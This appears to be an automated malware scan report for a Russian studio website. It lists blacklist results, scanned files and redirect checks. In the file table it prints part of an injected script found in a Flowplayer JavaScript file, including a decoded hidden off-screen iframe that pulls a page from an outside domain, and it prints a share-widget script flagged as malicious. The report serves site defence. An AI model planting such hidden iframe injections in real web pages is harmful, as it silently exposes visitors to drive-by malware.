Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=en.studio-prospect.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://en.studio-prospect.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://en.studio-prospect.ru/ | 200 OK Content-Length: 22893 Content-Type: text/html | clean |
http://en.studio-prospect.ru/media/system/js/modal.js | 200 OK Content-Length: 12489 Content-Type: application/x-javascript | clean |
http://en.studio-prospect.ru/components/com_k2/js/k2.js | 200 OK Content-Length: 4978 Content-Type: application/x-javascript | clean |
http://en.studio-prospect.ru/plugins/system/flowplayer_r/javascripts/flowplayer-3.2.6.min.js | 200 OK Content-Length: 18716 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var bebmain = 0; if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) { return bebmain; } return false; } function see_user_agent(){ var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey ...[3763 bytes skipped]... Decoded script: function () { __flash_unloadHandler = function () {}; __flash_savedUnloadHandler = function () {}; } <iframe src="http://Internet.sololineas.com/dfgatrsjygfhsrtjs12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe> | ||
http://en.studio-prospect.ru/plugins/system/flowplayer_r/swfplugins/flowplayer.ipad-3.2.2.min.js | 200 OK Content-Length: 13534 Content-Type: application/x-javascript | clean |
http://en.studio-prospect.ru/media/system/js/caption.js | 200 OK Content-Length: 3864 Content-Type: application/x-javascript | clean |
http://en.studio-prospect.ru/templates/prospect-main/js/script.js | 200 OK Content-Length: 3223 Content-Type: application/x-javascript | clean |
http://odnaknopka.ru/ok3.js | 200 OK Content-Length: 2766 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function NewOdnaknopka3() {
this.domain=location.href+'/'; this.domain=this.domain.substr(this.domain.indexOf('://')+3); this.domain=this.domain.substr(0,this.domain.indexOf('/')); this.location=false; this.url=function(system) { var title=encodeURIComponent(document.title); var url=encodeURIComponent(location.href); switch (system) { case 1: return 'http://vkontakte.ru/share.php?url='+url; case 2: return 'http://www.facebook.com/sharer.php?u='+u for (i=0;i<12;i++) { html+='<a href="'+this.url(i+1)+'" onclick="return odnaknopka3.go('+(i+1)+');"><img src="http://odnaknopka.ru/images/blank.gif" width="16" height="16" alt=" #" title="'+titles[i]+'" style="border:0;padding:0;margin:0 4px 0 0;background:url(http://odnaknopka.ru/images/panel.png) no-repeat -270px -'+(i*16)+'px"/></a>'; } document.write(html); } } odnaknopka3=new NewOdnaknopka3(); odnaknopka3.init(); Antivirus reports:
| ||
http://en.studio-prospect.ru/index.php | 200 OK Content-Length: 22902 Content-Type: text/html | clean |
http://en.studio-prospect.ru/skype:video_line?chat | 404 Not Found Content-Length: 1844 Content-Type: text/html | clean |
http://en.studio-prospect.ru/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://en.studio-prospect.ru/uslugi.html | 200 OK Content-Length: 18576 Content-Type: text/html | clean |
http://en.studio-prospect.ru/portfolio.html | 200 OK Content-Length: 35645 Content-Type: text/html | clean |
http://en.studio-prospect.ru/modules/mod_gk_image_show/js/style1/engine.js | 200 OK Content-Length: 7123 Content-Type: application/x-javascript | clean |
http://en.studio-prospect.ru/klienti.html | 200 OK Content-Length: 28802 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: en.studio-prospect.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 20 Aug 2014 17:30:55 GMT
Pragma: no-cache
Server: nginx/1.6.0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 20 Aug 2014 17:30:55 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 9ac3cba7bc1282f2a6e67d457df26c91=e5de446d35d73d9db34c4c24970c0e3a; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: en.studio-prospect.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 20 Aug 2014 17:30:55 GMT
Pragma: no-cache
Server: nginx/1.6.0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 20 Aug 2014 17:30:55 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 9ac3cba7bc1282f2a6e67d457df26c91=e5de446d35d73d9db34c4c24970c0e3a; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: en.studio-prospect.ru
Referer: http://www.google.com/search?q=en.studio-prospect.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: en.studio-prospect.ru
Referer: http://www.google.com/search?q=en.studio-prospect.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.